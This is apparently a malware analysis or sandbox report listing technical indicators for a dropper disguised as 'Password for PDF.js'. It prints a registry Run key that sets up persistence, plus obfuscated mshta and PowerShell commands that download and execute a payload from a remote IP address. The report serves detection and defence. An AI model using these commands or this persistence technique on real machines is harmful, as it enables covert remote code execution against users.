Technical information
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Edge' = 'mshta vbscript:close(CreateObject("WScript.Shell").run("mshta http://171.22.28.214/o",0))'
- %APPDATA%\password for pdf.js
- '17#.#2.28.214':80
- http://17#.#2.28.214/o
- http://17#.#2.28.214/o/
- http://17#.#2.28.214/o/o.png
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\mshta.exe' http://171.22.28.214/o' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://171.22.28.214/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Password for PDF.js"
- '%WINDIR%\syswow64\mshta.exe' http://171.22.28.214/o
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://171.22.28.214/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X